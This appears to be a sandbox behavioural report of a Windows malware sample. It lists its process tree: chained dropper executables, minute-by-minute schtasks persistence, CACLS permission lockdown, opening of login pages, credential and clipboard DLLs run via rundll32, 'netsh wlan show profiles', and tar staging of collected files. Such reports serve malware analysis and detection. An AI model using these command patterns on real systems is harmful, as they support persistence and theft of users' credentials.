PID 2172 wrote to memory of 2644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 4516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 4516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 4516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3096 wrote to memory of 3528 N/A N/A C:\Users\Admin\AppData\Local\Temp\74E.exe
PID 3096 wrote to memory of 3528 N/A N/A C:\Users\Admin\AppData\Local\Temp\74E.exe
PID 3096 wrote to memory of 3528 N/A N/A C:\Users\Admin\AppData\Local\Temp\74E.exe
PID 3528 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\74E.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe
PID 3528 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\74E.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe
PID 3528 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\74E.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe
PID 3096 wrote to memory of 2560 N/A N/A C:\Windows\system32\cmd.exe
PID 3096 wrote to memory of 2560 N/A N/A C:\Windows\system32\cmd.exe
PID 4256 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe
PID 4256 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe
PID 4256 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe
PID 3096 wrote to memory of 3152 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3096 wrote to memory of 3152 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3096 wrote to memory of 3152 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1896 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe
PID 1896 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe
PID 1896 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe
PID 5104 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe
PID 5104 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe
PID 5104 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe
PID 3096 wrote to memory of 4036 N/A N/A C:\Users\Admin\AppData\Local\Temp\B58.exe
PID 3096 wrote to memory of 4036 N/A N/A C:\Users\Admin\AppData\Local\Temp\B58.exe
PID 3096 wrote to memory of 4036 N/A N/A C:\Users\Admin\AppData\Local\Temp\B58.exe
PID 4956 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe
PID 4956 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe
PID 4956 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe

"C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

"C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "Admin:N"&&CACLS "pdates.exe" /P "Admin:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "Admin:N"&&CACLS "..\925e7e99c5" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "pdates.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "pdates.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\925e7e99c5" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\925e7e99c5" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\74E.exe

C:\Users\Admin\AppData\Local\Temp\74E.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\943.bat" "

C:\Users\Admin\AppData\Local\Temp\A4E.exe

C:\Users\Admin\AppData\Local\Temp\A4E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe

C:\Users\Admin\AppData\Local\Temp\B58.exe

C:\Users\Admin\AppData\Local\Temp\B58.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 668 -ip 668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,9008711190030245416,2527976111560978251,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,9008711190030245416,2527976111560978251,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3280 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\3528.exe

C:\Users\Admin\AppData\Local\Temp\3528.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6832 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x504 0x514

C:\Users\Admin\AppData\Local\Temp\3CDA.exe

C:\Users\Admin\AppData\Local\Temp\3CDA.exe

C:\Users\Admin\AppData\Local\Temp\3EDF.exe

C:\Users\Admin\AppData\Local\Temp\3EDF.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\45C5.exe

C:\Users\Admin\AppData\Local\Temp\45C5.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6336 -ip 6336

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\e8b5234212" /P "Admin:N"&&CACLS "..\e8b5234212" /P "Admin:R" /E&&Exit

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\tar.exe

tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\350690463354_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7520 /prefetch:8

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\e8b5234212" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\e8b5234212" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

